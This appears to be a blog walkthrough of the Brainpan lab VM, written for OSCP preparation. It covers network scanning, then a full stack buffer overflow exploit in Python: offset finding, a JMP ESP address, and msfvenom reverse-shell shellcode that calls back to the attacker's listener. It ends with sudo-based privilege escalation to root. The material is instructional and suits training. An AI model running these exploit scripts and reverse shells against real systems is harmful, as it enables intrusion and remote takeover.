Tuesday, June 18, 2019

BRAINPAN - Buffer Overflow

Hi Techmates! Brainpan is a vulnerable virtual machine which is designed for people who are preparing for OSCP or wants to exploit buffer overflow vulnerability. This blog will take you through exploiting Brainpan step by step.

Direct links to download the virtual machine - http://download.vulnhub.com/brainpan/Brainpan.zip

Setting up the Virtual Machine:

  • Download the ZIP file “brainpan.zip”.  
  • Extract the file in a folder.
  • Import the “brainpan.ova” file in Virtualbox or VMWare.
  • The network connectivity is set to Bridge by default. You can change it according to the requirement. If you are not sure do not change the default setting.
  • Start the Virtualbox/VMWare.

Attacker’s IP - 192.168.43.204
Victim’s IP(Brainpan) - Step 1

Exploiting Brainpan:


Step 1: Discovering the IP Address

  • Discover the active host in the network using-
    • Nmap - nmap 192.168.43.1/24
    • Netdiscover - netdiscover
  • Brainpan VM is running on 192.168.43.205

Step 2: Scanning

  • Nmap - nmap -sC -sV -vv -Pn -p 1-65535 192.168.43.205



#nmap -Pn -sC -sV -vv -A 192.168.43.205 -p 1-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-26 08:22 IST
Warning: File ./nmap.xsl exists, but Nmap is using /usr/bin/../share/nmap/nmap.xsl for security and consistency reasons. set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:22
Completed Parallel DNS resolution of 1 host. at 08:22, 4.09s elapsed
Initiating Connect Scan at 08:22
Scanning 192.168.43.205 [65535 ports]
Discovered open port 9999/tcp on 192.168.43.205
Discovered open port 10000/tcp on 192.168.43.205
Completed Connect Scan at 08:22, 0.88s elapsed (65535 total ports)
Initiating Service scan at 08:22
Scanning 2 services on 192.168.43.205
Completed Service scan at 08:22, 6.11s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.43.205.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:22
NSE Timing: About 99.64% done; ETC: 08:23 (0:00:00 remaining)
Completed NSE at 08:23, 31.09s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.04s elapsed
Nmap scan report for 192.168.43.205
Host is up, received user-set (0.00016s latency).
Scanned at 2018-10-26 08:22:27 IST for 38s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT STATE SERVICE REASON VERSION
9999/tcp open abyss? syn-ack
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [______________________ WELCOME TO BRAINPAN _______________________]
|_ ENTER THE PASSWORD
10000/tcp open http syn-ack SimpleHTTPServer 0.6 (Python 2.7.3)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.70%I=7%D=10/26%Time=5BD28172%P=x86_64-pc-linux-gnu%r(N
SF:ULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\
SF:|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20
SF:\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\
SF:x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\
SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\
SF:x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\
SF:x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\
SF:x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\
SF:x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\
SF:x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.27 seconds

We have two tcp ports open: 9999 - abyss, 10000 - http.
  • Nikto - nikto -h 192.168.43.205 -p 10000
# sudo nikto -h 192.168.43.205 -p 10000
- Nikto v2.1.6

+ Target IP: 192.168.43.205
+ Target Hostname: 192.168.43.205
+ Target Port: 10000
+ Start Time: 2018-10-26 08:26:22 (GMT5.5)

+ Server: SimpleHTTP/0.6 Python/2.7.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ Python/2.7.3 appears to be outdated (current is at least 2.7.5)
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 7 item(s) reported on remote host
+ End Time: 2018-10-26 08:26:30 (GMT5.5) (8 seconds)

+ 1 host(s) tested

Step 3: Browse http://192.168.43.205:10000/. Checking the source code of the given page also doesn’t reveal much information.


Exhibit 1

Step 4: Run a Dirbuster scan  - dirb http://192.168.43.205:10000/

#dirb http://192.168.43.205:10000/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Nov  1 18:23:17 2018
URL_BASE: http://192.168.43.205:10000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                     

---- Scanning URL: http://192.168.43.205:10000/ ----
+ http://192.168.43.205:10000/bin (CODE:301|SIZE:0)                       
+ http://192.168.43.205:10000/index.html (CODE:200|SIZE:215)              
                                                                         
-----------------
END_TIME: Thu Nov  1 18:23:24 2018
DOWNLOADED: 4612 - FOUND: 2

Step 5: Here is what’s seen when connecting to 192.168.43.205:9999 using netcat:
  • nc 192.168.43.205 9999

Exhibit 2

Step 6: Try entering any password, it shows access denied.

Step 7: Browse http://192.168.43.205:10000/bin. We can see “brainpan.exe file which is a windows executable file.


Exhibit 3

Step 8: Let us check this file using “file” command.


Exhibit 4
Step 9: Let us check the file using “strings” command - Strings brainpan.exe. Let us take a look at the functions executables.


Exhibit 5

Since the application uses functions like socket, send, bind, recv, listen and accept, we can tell that it is a network server application. Functions like strcmp, strlen, printf and strcpy is also used. Strcpy is an important function since it is vulnerable to buffer overflow attack.

Step 10: Install Immunity debugger in windows machine and copy the executable. Click on File → Open → Brainpan.exe. Press f9 or click on run.


Exhibit 6

Step 11: We can see the service running on port 9999 and the function ‘strcpy’ vulnerable to buffer overflow attack. Lets us write a simple attacker’s script to see if we can crash the application. The following python script will connect to the service and send 1000 "A"s to the service:

import sys,socket
host = "192.168.43.88" #IP Address of Windows Machine
port = 9999

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
   s.connect((host,port))
   s.recv(1024)
   junk = b"A"*524
   s.sendall(junk)
   print "Sent"

except:
   print "Unable to connect " + str(host)
   sys.exit(0)

Step 12: Save the file as exploit_brainpan.py. Executing the exploit from Kali linux - python exploit_brainpan.py.


Exhibit 7

Step 13: As soon as the payload is sent you notice that the EIP has been overwritten with 41414141 i.e. “AAAA” in Immunity Debugger.


Exhibit 8

Step 14: Thus, EIP has been successfully overwritten with A’s (ox41). The next step would be to determine after how many bytes the EIP is being overwritten. We will be using pattern_create and patter_offset using metasploit framework. To create a pattern go to /usr/share/metasploit-framework/tools/exploit/ and type the given command:


#./pattern_create.rb  -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Step 15: We will take this pattern and replace the 1000 "A"s in our exploit with this entire pattern, so our exploit now looks like:

import sys,socket
host = "192.168.43.88"
port = 9999

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
print "Connecting to " +str(host)
s.connect((host,port))
s.recv(1024)
junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
print "Sending Payload..."
s.sendall(junk)
print "Sent"

except:
print "Unable to connect " + str(host)
sys.exit(0)

Step 16: Execute the script. Executing the program we see that the EIP is overwritten with 35724134.


Exhibit 9

Step 17: Let us check the pattern_offset using metasploit framework. Type the given command in the terminal.


Exhibit 10

Step 18: The updated attacker’s code will look like:


import sys,socket
host = "192.168.43.88"
port = 9999

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
print "Connecting to " +str(host)
s.connect((host,port))
s.recv(1024)
junk = b"A"*524
EIP = b"BBBB"
payload = b'C'*500
print "Sending Payload..."
s.sendall(junk+EIP+payload)
print "Sent"

except:
print "Unable to connect " + str(host)
sys.exit(0)

Step 19: Execute the script. You will notice that the EIP gets overwritten with 42424242 i.e. BBBB.


Exhibit 11

Step 20: Now we need to overwrite the EIP with JMP ESP address.So we need to find an instruction like jmp esp, call esp, or push esp; ret.
Go to View→ Executable Modules and select the DLL file i.e. brainpan.exe whose SafeSEH and ASLR is set to False. This memory addresses containing a jmp esp instructions is good to put in EIP and make the flow jump to our Shellcode.


Exhibit 12

Step 21: Right click and click on Search→ Command.


Exhibit 13

Step 22: Enter the command JMP ESP and click on Find. You will notice JMP ESP in address 311712F3.


Exhibit 14

Step 23: Change the EIP with JMP ESP code.
Note: The EIP address is arranged in backward as it is sent to the stack i.e. \xf3\x12\x17\x31.

Step 24: Let us send the following exploit to the application.


import sys,socket
host = "192.168.43.88"
port = 9999

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
print "Connecting to " +str(host)
s.connect((host,port))
s.recv(1024)

junk = b"A"*524
EIP = b'\xf3\x12\x17\x31'
payload = b"C"*10+b"D"*10
print "Sending Payload..."
s.sendall(junk+EIP+payload)
print "Sent"

except:
print "Unable to connect " + str(host)
sys.exit(0)

Step 25: Send the payload. You can notice that the ESP gets overwritten with 10 D’s. Thus the first 10 C’s used has to be set to \x90 i.e. No operation value.


Exhibit 15

Step 26: The next step would be creating a payload. To create a reverse TCP Shellcode open terminal and type the following command in the terminal.

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.204 LPORT=1234 R -e x86/shikata_ga_nai -b '\x00' -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xdb\xc2\xbb\xd5\x90\x9d\x1c\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x31\x58\x17\x83\xe8\xfc\x03\x8d\x83\x7f\xe9\xd1\x4c\xfd"
"\x12\x29\x8d\x62\x9a\xcc\xbc\xa2\xf8\x85\xef\x12\x8a\xcb\x03"
"\xd8\xde\xff\x90\xac\xf6\xf0\x11\x1a\x21\x3f\xa1\x37\x11\x5e"
"\x21\x4a\x46\x80\x18\x85\x9b\xc1\x5d\xf8\x56\x93\x36\x76\xc4"
"\x03\x32\xc2\xd5\xa8\x08\xc2\x5d\x4d\xd8\xe5\x4c\xc0\x52\xbc"
"\x4e\xe3\xb7\xb4\xc6\xfb\xd4\xf1\x91\x70\x2e\x8d\x23\x50\x7e"
"\x6e\x8f\x9d\x4e\x9d\xd1\xda\x69\x7e\xa4\x12\x8a\x03\xbf\xe1"
"\xf0\xdf\x4a\xf1\x53\xab\xed\xdd\x62\x78\x6b\x96\x69\x35\xff"
"\xf0\x6d\xc8\x2c\x8b\x8a\x41\xd3\x5b\x1b\x11\xf0\x7f\x47\xc1"
"\x99\x26\x2d\xa4\xa6\x38\x8e\x19\x03\x33\x23\x4d\x3e\x1e\x2c"
"\xa2\x73\xa0\xac\xac\x04\xd3\x9e\x73\xbf\x7b\x93\xfc\x19\x7c"
"\xd4\xd6\xde\x12\x2b\xd9\x1e\x3b\xe8\x8d\x4e\x53\xd9\xad\x04"
"\xa3\xe6\x7b\x8a\xf3\x48\xd4\x6b\xa3\x28\x84\x03\xa9\xa6\xfb"
"\x34\xd2\x6c\x94\xdf\x29\xe7\x5b\xb7\x1a\x3b\x33\xca\x5c\xc7"
"\x16\x43\xba\xad\x86\x02\x15\x5a\x3e\x0f\xed\xfb\xbf\x85\x88"
"\x3c\x4b\x2a\x6d\xf2\xbc\x47\x7d\x63\x4d\x12\xdf\x22\x52\x88"
"\x77\xa8\xc1\x57\x87\xa7\xf9\xcf\xd0\xe0\xcc\x19\xb4\x1c\x76"
"\xb0\xaa\xdc\xee\xfb\x6e\x3b\xd3\x02\x6f\xce\x6f\x21\x7f\x16"
"\x6f\x6d\x2b\xc6\x26\x3b\x85\xa0\x90\x8d\x7f\x7b\x4e\x44\x17"
"\xfa\xbc\x57\x61\x03\xe9\x21\x8d\xb2\x44\x74\xb2\x7b\x01\x70"
"\xcb\x61\xb1\x7f\x06\x22\xc1\x35\x0a\x03\x4a\x90\xdf\x11\x17"
"\x23\x0a\x55\x2e\xa0\xbe\x26\xd5\xb8\xcb\x23\x91\x7e\x20\x5e"

Step 27: Now the final shellcode looks like:


import sys,socket
host = "169.254.255.83"
port = 9999

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
   print "Connecting to " +str(host)
   s.connect((host,port))
   s.recv(1024)

   junk = b"A"*524
   EIP = b'\xf3\x12\x17\x31'
   nops=b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
   
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=1234 R -e x86/shikata_ga_nai -b '\x00' -f c

   payload = b'\xbd\x39\x83\xf4\x35\xd9\xc0\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\xd3\x7f\x16\xc0\xdf\x68\x55\x2b\x1f\x69\x3a\xa5\xfa\x58\x7a\xd1\x8f\xcb\x4a\x91\xdd\xe7\x21\xf7\xf5\x7c\x47\xd0\xfa\x35\xe2\x06\x35\xc5\x5f\x7a\x54\x45\xa2\xaf\xb6\x74\x6d\xa2\xb7\xb1\x90\x4f\xe5\x6a\xde\xe2\x19\x1e\xaa\x3e\x92\x6c\x3a\x47\x47\x24\x3d\x66\xd6\x3e\x64\xa8\xd9\x93\x1c\xe1\xc1\xf0\x19\xbb\x7a\xc2\xd6\x3a\xaa\x1a\x16\x90\x93\x92\xe5\xe8\xd4\x15\x16\x9f\x2c\x66\xab\x98\xeb\x14\x77\x2c\xef\xbf\xfc\x96\xcb\x3e\xd0\x41\x98\x4d\x9d\x06\xc6\x51\x20\xca\x7d\x6d\xa9\xed\x51\xe7\xe9\xc9\x75\xa3\xaa\x70\x2c\x09\x1c\x8c\x2e\xf2\xc1\x28\x25\x1f\x15\x41\x64\x48\xda\x68\x96\x88\x74\xfa\xe5\xba\xdb\x50\x61\xf7\x94\x7e\x76\xf8\x8e\xc7\xe8\x07\x31\x38\x21\xcc\x65\x68\x59\xe5\x05\xe3\x99\x0a\xd0\xa4\xc9\xa4\x8b\x04\xb9\x04\x7c\xed\xd3\x8a\xa3\x0d\xdc\x40\xcc\xa4\x27\x03\x33\x90\x26\xd5\xdb\xe3\x28\xdd\xc9\x6d\xce\xb7\xfd\x3b\x59\x20\x67\x66\x11\xd1\x68\xbc\x5c\xd1\xe3\x33\xa1\x9c\x03\x39\xb1\x49\xe4\x74\xeb\xdc\xfb\xa2\x83\x83\x6e\x29\x53\xcd\x92\xe6\x04\x9a\x65\xff\xc0\x36\xdf\xa9\xf6\xca\xb9\x92\xb2\x10\x7a\x1c\x3b\xd4\xc6\x3a\x2b\x20\xc6\x06\x1f\xfc\x91\xd0\xc9\xba\x4b\x93\xa3\x14\x27\x7d\x23\xe0\x0b\xbe\x35\xed\x41\x48\xd9\x5c\x3c\x0d\xe6\x51\xa8\x99\x9f\x8f\x48\x65\x4a\x14\x78\x2c\xd6\x3d\x11\xe9\x83\x7f\x7c\x0a\x7e\x43\x79\x89\x8a\x3c\x7e\x91\xff\x39\x3a\x15\xec\x33\x53\xf0\x12\xe7\x54\xd1'

   print "Sending Payload..."
   s.sendall(junk+EIP+nops+payload)
   print "Sent"

except:
   print "Unable to connect " + str(host)
   sys.exit(0)

Step 28: We will run our exploit now. Before running the exploit run 'nc -nvlp 1234' on your attacking machine:

nc -nvlp 1234

Step 29: Run the exploit. We have a reverse shell on our WinXP test machine!

Exhibit 16

Step 30: Now we need to generate a new shellcode for linux and run it against the brainpan machine.

#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.43.204 LPORT=1234 R -e x86/alpha_upper -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 205 (iteration=0)
x86/alpha_upper chosen with final size 205
Payload size: 205 bytes
Final size of c file: 886 bytes
unsigned char buf[] =
"\x89\xe6\xd9\xe1\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x36\x51\x39\x4b\x4c\x37\x4d\x33"
"\x56\x33\x31\x53\x30\x53\x33\x5a\x54\x42\x4c\x49\x4b\x51\x58"
"\x30\x53\x56\x58\x4d\x4d\x50\x4a\x33\x46\x39\x58\x30\x47\x4f"
"\x58\x4d\x4b\x30\x30\x49\x52\x59\x4b\x49\x45\x38\x49\x50\x4f"
"\x58\x36\x4b\x38\x4c\x43\x58\x45\x52\x55\x50\x34\x44\x48\x52"
"\x4b\x39\x4b\x51\x48\x30\x32\x46\x50\x50\x50\x51\x50\x53\x4e"
"\x53\x35\x53\x4d\x59\x4b\x51\x38\x4d\x4d\x50\x56\x32\x52\x48"
"\x52\x4e\x56\x4f\x42\x53\x42\x48\x33\x58\x46\x4f\x46\x4f\x45"
"\x32\x32\x49\x4d\x59\x4d\x33\x51\x42\x50\x53\x4d\x59\x4b\x51"
"\x4e\x50\x54\x4b\x38\x4d\x4d\x50\x41\x41";

Step 31: We now have a low privileged shell on our victim machine. Let’s continue.


Exhibit 17

Step 32: We’ll take a look in the home directory to see if there is anything interesting…. nope. The only thing noticeable is that there is a script which restarts the web service should it die, as well as the root of the web service running on port 10000. Let us check if we have any special permissions we can use with sudo.


#sudo -l
Matching Defaults entries for puck on this host:
   env_reset, mail_badpass,
   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
   (root) NOPASSWD: /home/anansi/bin/anansi_util

Step 33: Type python -c "import pty; pty.spawn('/bin/bash')". The - manual [command] part stands out immediately. Let’s see if we can run a [command] with root privileges.


Exhibit 18

Bingo!! We got the root access.


Exhibit 20

Hope you learned and enjoyed it!!